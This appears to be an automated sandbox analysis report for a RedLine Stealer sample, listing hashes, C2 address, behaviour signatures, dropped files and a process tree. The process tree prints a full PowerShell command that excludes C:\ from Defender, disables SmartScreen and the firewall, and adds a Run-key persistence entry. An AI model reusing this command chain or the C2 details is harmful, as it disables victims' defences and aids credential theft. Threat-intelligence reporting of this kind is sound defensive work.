Overview

overview

10

Static

static

96c2ef023f...c3.exe

windows7_x64

10

96c2ef023f...c3.exe

windows10_x64

10

Analysis

  • max time kernel
    144s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    26-09-2021 22:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    96c2ef023febbd4e3773bbb3a59e54c3.exe

  • Size

    417KB

  • MD5

    96c2ef023febbd4e3773bbb3a59e54c3

  • SHA1

    8e20dc3097d3380f1b2c567a05b3a7d8dae713bf

  • SHA256

    770e6bbe4c4f4e7abfbb4a533d28f8e44c5a374aa05dc3c333d7f15594e217e7

  • SHA512

    f5e45c4c6f09c1d1d40832b1611fbff8ba822964cdb40e397254ae143a44f8c822ca7b5dcbdd7a3ddbd5f1b383fd7c1db2233ac9301fbc58f3c75f280abb9370

Score
10/10
redline7w06zphydiscoveryevasioninfostealerpersistencespywarestealersuricata

Malware Config

Extracted

Family

redline

Botnet

7W06ZPHY

C2

188.34.176.164:80

Signatures

  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
    "C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3968
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1592
    • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
      C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
      2⤵
        PID:3364
      • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
        C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1860
        • C:\Users\Admin\AppData\Local\Temp\rcn.exe
          "C:\Users\Admin\AppData\Local\Temp\rcn.exe"
          3⤵
          • Executes dropped EXE
          • Drops startup file
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:880
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
            4⤵
            • Modifies security service
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3544
            • C:\ProgramData\UpSys.exe
              "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:2940
              • C:\ProgramData\UpSys.exe
                "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:3644
                • C:\ProgramData\UpSys.exe
                  "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                  7⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3672
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                    8⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3848
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
              5⤵
                PID:804
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 880 -s 1604
              4⤵
              • Suspicious use of NtCreateProcessExOtherParentProcess
              • Program crash
              • Suspicious behavior: EnumeratesProcesses
              PID:2588

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\MicrosoftNetwork\System.exe
        MD5

        cfadb3a07eb0470aeeec9fa3dbb3ad67

        SHA1

        37d6410c23e9ca02bc7ed3c75743b3295dd19712

        SHA256

        1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

        SHA512

        713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

        Download Submit

      • C:\ProgramData\UpSys.exe
        MD5

        efe5769e37ba37cf4607cb9918639932

        SHA1

        f24ca204af2237a714e8b41d54043da7bbe5393b

        SHA256

        5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

        SHA512

        33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

        Download Submit

      • C:\ProgramData\UpSys.exe
        MD5

        efe5769e37ba37cf4607cb9918639932

        SHA1

        f24ca204af2237a714e8b41d54043da7bbe5393b

        SHA256

        5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

        SHA512

        33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

        Download Submit

      • C:\ProgramData\UpSys.exe
        MD5

        efe5769e37ba37cf4607cb9918639932

        SHA1

        f24ca204af2237a714e8b41d54043da7bbe5393b

        SHA256

        5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

        SHA512

        33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

        Download Submit

      • C:\ProgramData\UpSys.exe
        MD5

        efe5769e37ba37cf4607cb9918639932

        SHA1

        f24ca204af2237a714e8b41d54043da7bbe5393b

        SHA256

        5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

        SHA512

        33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\96c2ef023febbd4e3773bbb3a59e54c3.exe.log
        MD5

        377926f80239dae91115ba6b0834d596

        SHA1

        fe1c81f4b1f0ec6aa4534f4a9d988138b78db112

        SHA256

        d8493b667906732f79d5670c5697e5ffe8ccbd7040be4784af8ea109c1b5ba1b

        SHA512

        ad5d3c5d1d557ac27cbcba4d1ba97aa10b393cb88a8f2e36a6027db281c08dcbb0cfd0cd3b2b5198f7cc0513003074ab0878bab110621a408f3c6ca112e8291e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        MD5

        e71a0a7e48b10bde0a9c54387762f33e

        SHA1

        fed75947f1163b00096e24a46e67d9c21e7eeebd

        SHA256

        83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

        SHA512

        394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        16de00852dd78689c92b775ab9c106b6

        SHA1

        61867187a977052ef84709fd03592a8cb3d1256e

        SHA256

        15fbfba2bfd9a2bffa3b545e349d5fb80fe95ce7da9ec042eec95eedf5d1847e

        SHA512

        381b0875565cbdfdbbd005ba5c4824b206730cad268501d4142d63b84195d3e9f02c8874e5f3ee3d0d28b96cb4df67282e7f447ec741121d92826fc2a40045b4

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        299fc7d15ae672de3d1c0c0506eea425

        SHA1

        35317021fcf228df16951c7ce384dcc05fd7af35

        SHA256

        8b18c938faeb63bde81034a3763eae41a4c0366fae6b4e981245101f29897b7d

        SHA512

        56672f8b8466ab0717e69307d9aca5b5e03f2c06adf6fc632fe94c2e73b832b2c9de5fb9ebb91146a1e262291bbad3a9d54523c3d088afca60c001f4dd9ac7d8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\rcn.exe
        MD5

        cfadb3a07eb0470aeeec9fa3dbb3ad67

        SHA1

        37d6410c23e9ca02bc7ed3c75743b3295dd19712

        SHA256

        1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

        SHA512

        713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\rcn.exe
        MD5

        cfadb3a07eb0470aeeec9fa3dbb3ad67

        SHA1

        37d6410c23e9ca02bc7ed3c75743b3295dd19712

        SHA256

        1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

        SHA512

        713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

        Download Submit

      • memory/804-387-0x0000000000000000-mapping.dmp

        Download

      • memory/880-338-0x00007FF97B310000-0x00007FF97B312000-memory.dmp

        Filesize

        8KB

        Download

      • memory/880-337-0x00007FF97B300000-0x00007FF97B302000-memory.dmp

        Filesize

        8KB

        Download

      • memory/880-336-0x00007FF97B320000-0x00007FF97B322000-memory.dmp

        Filesize

        8KB

        Download

      • memory/880-335-0x00007FF7A4440000-0x00007FF7A4EFD000-memory.dmp

        Filesize

        10.7MB

        Download

      • memory/880-332-0x0000000000000000-mapping.dmp

        Download

      • memory/1592-260-0x00000000045B3000-0x00000000045B4000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1592-224-0x00000000045B2000-0x00000000045B3000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1592-223-0x00000000045B0000-0x00000000045B1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1592-213-0x0000000000000000-mapping.dmp

        Download

      • memory/1860-331-0x0000000007170000-0x0000000007171000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1860-319-0x00000000053B0000-0x00000000053B1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1860-325-0x00000000073F0000-0x00000000073F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1860-324-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1860-323-0x00000000052A0000-0x00000000058A6000-memory.dmp

        Filesize

        6.0MB

        Download

      • memory/1860-329-0x0000000006FC0000-0x0000000006FC1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1860-322-0x00000000054C0000-0x00000000054C1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1860-312-0x0000000000400000-0x0000000000422000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1860-313-0x000000000041C5D6-mapping.dmp

        Download

      • memory/1860-321-0x00000000052E0000-0x00000000052E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1860-317-0x00000000058B0000-0x00000000058B1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1860-318-0x0000000002E30000-0x0000000002E31000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2384-310-0x0000000000F60000-0x0000000000F92000-memory.dmp

        Filesize

        200KB

        Download

      • memory/2384-320-0x0000000005120000-0x0000000005121000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2384-117-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2384-311-0x0000000004FD0000-0x0000000004FE9000-memory.dmp

        Filesize

        100KB

        Download

      • memory/2384-115-0x0000000000530000-0x0000000000531000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2940-380-0x0000000000000000-mapping.dmp

        Download

      • memory/3544-345-0x0000016B476E0000-0x0000016B476E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3544-351-0x0000016B499E0000-0x0000016B499E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3544-388-0x0000016B47788000-0x0000016B47789000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3544-376-0x0000016B47786000-0x0000016B47788000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3544-354-0x0000016B47783000-0x0000016B47785000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3544-352-0x0000016B47780000-0x0000016B47782000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3544-339-0x0000000000000000-mapping.dmp

        Download

      • memory/3848-441-0x000001EC27610000-0x000001EC27611000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3848-424-0x000001EC25163000-0x000001EC25165000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3848-423-0x000001EC25160000-0x000001EC25162000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3848-407-0x0000000000000000-mapping.dmp

        Download

      • memory/3968-130-0x0000000008B30000-0x0000000008B31000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-123-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-128-0x0000000008210000-0x0000000008211000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-129-0x0000000008620000-0x0000000008621000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-147-0x000000000AA00000-0x000000000AA01000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-131-0x0000000008910000-0x0000000008911000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-126-0x0000000007F40000-0x0000000007F41000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-125-0x0000000007770000-0x0000000007771000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-124-0x0000000004ED2000-0x0000000004ED3000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-127-0x0000000007FB0000-0x0000000007FB1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-136-0x00000000098E0000-0x00000000098E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-122-0x0000000007910000-0x0000000007911000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-121-0x0000000004E10000-0x0000000004E11000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-118-0x0000000000000000-mapping.dmp

        Download

      • memory/3968-137-0x0000000009620000-0x0000000009621000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-138-0x0000000009670000-0x0000000009671000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-139-0x0000000009E80000-0x0000000009E81000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3968-142-0x0000000004ED3000-0x0000000004ED4000-memory.dmp

        Filesize

        4KB

        Download